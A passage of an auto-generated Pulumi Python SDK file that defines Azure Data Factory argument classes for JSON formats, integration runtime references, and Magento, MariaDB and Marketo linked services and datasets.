:param Any json_path_definition: The JSONPath definition for each column mapping with a customized column name to extract data from JSON file. For fields under root object, start with "$"; for fields inside the array chosen by jsonNodeReference property, start from the array element. Example: {"Column1": "$.Column1Path", "Column2": "Column2PathInArray"}. Type: object (or Expression with resultType object).
:param Any nesting_separator: The character used to separate nesting levels. Default value is '.' (dot). Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'JsonFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if encoding_name is not None:
pulumi.set(__self__, "encoding_name", encoding_name)
if file_pattern is not None:
pulumi.set(__self__, "file_pattern", file_pattern)
if json_node_reference is not None:
pulumi.set(__self__, "json_node_reference", json_node_reference)
if json_path_definition is not None:
pulumi.set(__self__, "json_path_definition", json_path_definition)
if nesting_separator is not None:
pulumi.set(__self__, "nesting_separator", nesting_separator)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter(name="encodingName")
def encoding_name(self) -> Optional[Any]:
"""
The code page name of the preferred encoding. If not provided, the default value is 'utf-8', unless the byte order mark (BOM) denotes another Unicode encoding. The full list of supported values can be found in the 'Name' column of the table of encodings in the following reference: https://go.microsoft.com/fwlink/?linkid=861078. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encoding_name")
@encoding_name.setter
def encoding_name(self, value: Optional[Any]):
pulumi.set(self, "encoding_name", value)
@property
@pulumi.getter(name="filePattern")
def file_pattern(self) -> Optional[pulumi.Input[str]]:
"""
File pattern of JSON. To be more specific, the way of separating a collection of JSON objects. The default value is 'setOfObjects'. It is case-sensitive.
"""
return pulumi.get(self, "file_pattern")
@file_pattern.setter
def file_pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_pattern", value)
@property
@pulumi.getter(name="jsonNodeReference")
def json_node_reference(self) -> Optional[Any]:
"""
The JSONPath of the JSON array element to be flattened. Example: "$.ArrayPath". Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "json_node_reference")
@json_node_reference.setter
def json_node_reference(self, value: Optional[Any]):
pulumi.set(self, "json_node_reference", value)
@property
@pulumi.getter(name="jsonPathDefinition")
def json_path_definition(self) -> Optional[Any]:
"""
The JSONPath definition for each column mapping with a customized column name to extract data from JSON file. For fields under root object, start with "$"; for fields inside the array chosen by jsonNodeReference property, start from the array element. Example: {"Column1": "$.Column1Path", "Column2": "Column2PathInArray"}. Type: object (or Expression with resultType object).
"""
return pulumi.get(self, "json_path_definition")
@json_path_definition.setter
def json_path_definition(self, value: Optional[Any]):
pulumi.set(self, "json_path_definition", value)
@property
@pulumi.getter(name="nestingSeparator")
def nesting_separator(self) -> Optional[Any]:
"""
The character used to separate nesting levels. Default value is '.' (dot). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "nesting_separator")
@nesting_separator.setter
def nesting_separator(self, value: Optional[Any]):
pulumi.set(self, "nesting_separator", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
key: pulumi.Input['SecureStringArgs']):
"""
The base definition of a secret type.
:param pulumi.Input[str] authorization_type: Type of the secret.
:param pulumi.Input['SecureStringArgs'] key: Type of the secret.
"""
pulumi.set(__self__, "authorization_type", 'Key')
pulumi.set(__self__, "key", key)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input['SecureStringArgs']:
"""
Type of the secret.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
resource_id: pulumi.Input[str]):
"""
The base definition of a secret type.
:param pulumi.Input[str] authorization_type: Type of the secret.
:param pulumi.Input[str] resource_id: The resource ID of the integration runtime to be shared.
"""
pulumi.set(__self__, "authorization_type", 'RBAC')
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the integration runtime to be shared.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@pulumi.input_type
class LinkedServiceReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Linked service reference type.
:param pulumi.Input[str] reference_name: Reference LinkedService name.
:param pulumi.Input[str] type: Linked service reference type.
:param pulumi.Input[Mapping[str, Any]] parameters: Arguments for LinkedService.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference LinkedService name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Linked service reference type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Arguments for LinkedService.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class MagentoLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Magento server linked service.
:param Any host: The URL of the Magento instance. (i.e. 192.168.222.110/magento3)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token from Magento.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Magento')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the Magento instance. (i.e. 192.168.222.110/magento3)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token from Magento.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class MagentoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Magento server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MagentoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
"""
Managed integration runtime, including managed elastic and managed dedicated integration runtimes.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input['IntegrationRuntimeComputePropertiesArgs'] compute_properties: The compute resource for managed integration runtime.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input['IntegrationRuntimeSsisPropertiesArgs'] ssis_properties: SSIS properties for managed integration runtime.
"""
pulumi.set(__self__, "type", 'Managed')
if compute_properties is not None:
pulumi.set(__self__, "compute_properties", compute_properties)
if description is not None:
pulumi.set(__self__, "description", description)
if ssis_properties is not None:
pulumi.set(__self__, "ssis_properties", ssis_properties)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="computeProperties")
def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
"""
The compute resource for managed integration runtime.
"""
return pulumi.get(self, "compute_properties")
@compute_properties.setter
def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]):
pulumi.set(self, "compute_properties", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ssisProperties")
def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
"""
SSIS properties for managed integration runtime.
"""
return pulumi.get(self, "ssis_properties")
@ssis_properties.setter
def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]):
pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class MariaDBLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
MariaDB server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'MariaDB')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class MariaDBTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
MariaDB server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MariaDBTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MarketoLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Marketo server linked service.
:param Any client_id: The client Id of your Marketo service.
:param Any endpoint: The endpoint of the Marketo server. (i.e. 123-ABC-321.mktorest.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret of your Marketo service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Marketo')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client Id of your Marketo service.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Marketo server. (i.e. 123-ABC-321.mktorest.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret of your Marketo service.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
